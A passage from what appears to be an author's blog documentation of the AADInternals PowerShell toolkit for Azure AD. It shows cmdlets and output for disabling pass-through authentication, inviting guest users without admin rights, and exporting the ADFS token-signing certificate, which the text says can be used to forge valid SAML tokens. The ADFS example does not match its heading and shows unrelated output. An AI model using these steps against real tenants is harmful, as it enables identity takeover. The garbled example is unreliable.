Set-AADIntPassThroughAuthentication -AccessToken $pt -Enable $false


IsSuccesful Enable Exists
----------- ------ ------
true        false  true 

New-AADIntGuestInvitation (Z)

This function invites a guest user to tenant. Does not require admin rights, as long as access to Azure Portal is allowed. Basically, this function allows every member of the tenant to invite guest users to the tenant.


# Get the auth token. Supports also external users (outlook.com, etc.)
$zt=Get-AADIntAuthTokenForAADIAMAPI -Credentials (Get-Credential)
# Get login information for a domain
New-AADIntGuestInvitation -AuthToken $zt -EmailAddress someone@outlook.com -Message "Welcome to our tenant!"


accountEnabled                        : True
usageLocation                         : 
mailNickname                          : someone_outlook.com#EXT#
passwordProfile                       : 
rolesEntity                           : 
selectedGroupIds                      : 
streetAddress                         : 
city                                  : 
state                                 : 
country                               : 
telephoneNumber                       : 
mobile                                : 
physicalDeliveryOfficeName            : 
postalCode                            : 
authenticationPhoneNumber             : 
authenticationAlternativePhoneNumber  : 
authenticationEmail                   : 
strongAuthenticationDetail            : @{verificationDetail=}
defaultImageUrl                       : 
ageGroup                              : 
consentProvidedForMinor               : 
legalAgeGroupClassification           : 
objectId                              : e250c8f5-3ff3-4eea-9d68-cff019fa850e
objectType                            : User
displayName                           : someone
userPrincipalName                     : someone_outlook.com#EXT#@company.onmicrosoft.com
thumbnailPhoto@odata.mediaContentType : 
givenName                             : 
surname                               : 
mail                                  : someone@outlook.com
dirSyncEnabled                        : 
alternativeSecurityIds                : {}
signInNamesInfo                       : {}
signInNames                           : {someone_outlook.com#EXT#@company.onmicrosoft.com}
ownedDevices                          : 
jobTitle                              : 
department                            : 
displayUserPrincipalName              : 
hasThumbnail                          : False
imageUrl                              : 
imageDataToUpload                     : 
source                                : 
sources                               : 
sourceText                            : 
userFlags                             : 
deletionTimestamp                     : 
permanentDeletionTime                 : 
alternateEmailAddress                 : 
manager                               : 
userType                              : Guest
isThumbnailUpdated                    : 
isAuthenticationContactInfoUpdated    : 
searchableDeviceKey                   : {}
displayEmail                          : 
creationType                          : Invitation
userState                             : PendingAcceptance
otherMails                            : {someone@outlook.com}

Export-AADIntADFSSigningCertificate (*)

This function exports the ADFS token signing certificate and decrypts it. Must be run on ADFS server.

The certificate can be used to create faked but valid SAML tokens.

Unfortunately the decryption part doesn’t work - yet. All help to solve this are more than welcome!


# Get login information for a domain
Get-AADIntLoginInformation -Domain company.com


1 rows copied.
Network packet size (bytes): 4096
Clock Time (ms.) Total     : 16     Average : (62.50 rows per sec.)
Exception calling "Close" with "0" argument(s): "The input data is not a complete block."
At line:95 char:9
+         $cs.Close()
+         ~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CryptographicException
Dr Nestori Syynimaa avatar
About Dr Nestori Syynimaa
Dr Syynimaa works as a CIO of eight cities and municipalities surrounding Tampere, the largest inland city in Nordic countries. He also runs his own consultation business Gerenios. Before moving to his current position, Dr Syynimaa worked as a consultant, trainer, and university lecturer for almost 20 years. He is a regular speaker on Office 365 and Azure security in scientific and professional conferences. Dr Syynimaa holds MCSA (Office 365) and is Microsoft Certified Trainer.
comments powered by Disqus